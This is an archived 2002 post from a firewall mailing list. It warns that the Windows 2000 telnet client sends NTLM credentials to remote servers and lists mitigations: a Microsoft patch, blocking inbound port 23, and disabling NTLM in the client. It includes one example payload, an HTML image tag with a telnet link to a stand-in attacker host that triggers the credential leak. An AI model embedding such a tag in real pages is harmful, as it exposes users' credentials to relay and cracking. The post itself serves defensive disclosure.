Re: [fw-wiz] Danger of telnet on w2k (Was: re: Annoying pop-ups)
From: Mikael Olsson (mikael.olsson@clavister.com)
Date: 10/30/02
- Next message: Elizabeth Zwicky: "RE: [fw-wiz] sunscreen vs netbios"
- Previous message: Alex Ongena: "[fw-wiz] Dynamic execution of a script on arrival of a packet"
- In reply to: Mikael Olsson: "Re: [fw-wiz] Annoying pop-ups"
- Next in thread: John Adams: "Re: [fw-wiz] Annoying pop-ups"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: Mikael Olsson <mikael.olsson@clavister.com> To: firewall-wizards@honor.icsalabs.com Date: Wed Oct 30 14:20:02 2002
Mikael Olsson wrote:
>
> PLUS port 23 (Telnet!)
> Sure, it isn't on by default, but people found ways to abuse DCOM to
> turn it on remotely. Uh oh.
I just figured that this deserved a bit of extra mention. I'm sure that
most people think "Bah. I've got a good admin password, and I don't log
on via telnet anyway, so I'm safe".
If so, here's something you need to know: Microsoft embedded NTLM auth
in telnet in w2k. This means that, unless instructed to do otherwise,
the w2k telnet client will send out NTLM authentication data of the
currently logged on user whenever you telnet to an NTLM-enabled server.
This same data sent out can be relayed back to your box and used
to log on to you without delay. It can also be fed to l0phtcrack.
Microsoft did indeed send out an advisory about this two years ago,
but I figured it deserved another mention, seeing as how people still
tend to forget about this. All it needs is an image tag like
<img src="telnet://evilserver.int:2323">
Stuff that can help:
- Read http://www.microsoft.com/technet/security/bulletin/MS00-067.asp
and install patch. The patch is to display a warning before NTLM
is sent to stuff outside the local zone. However, we have seen the zone
schemes be subverted before, so don't rely on it.
- Block port 23 inbound to avoid the direct relay back to your telnet
port. Disabling the telnet service might be a good idea, but don't
rely on it.
- Run "telnet" without arguments. Type "unset ntlm".
This prevents the telnet client from sending ntlm hashes at all.
- Blocking port 23 outbound will NOT help.
-- Mikael Olsson, Clavister AB Storgatan 12, Box 393, SE-891 28 ÖRNSKÖLDSVIK, Sweden Phone: +46 (0)660 29 92 00 Mobile: +46 (0)70 26 222 05 Fax: +46 (0)660 122 50 WWW: http://www.clavister.com Learn to count in Swedish! "ett, två, tre, fyra, fem, sex, sju ..."
- Next message: Elizabeth Zwicky: "RE: [fw-wiz] sunscreen vs netbios"
- Previous message: Alex Ongena: "[fw-wiz] Dynamic execution of a script on arrival of a packet"
- In reply to: Mikael Olsson: "Re: [fw-wiz] Annoying pop-ups"
- Next in thread: John Adams: "Re: [fw-wiz] Annoying pop-ups"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
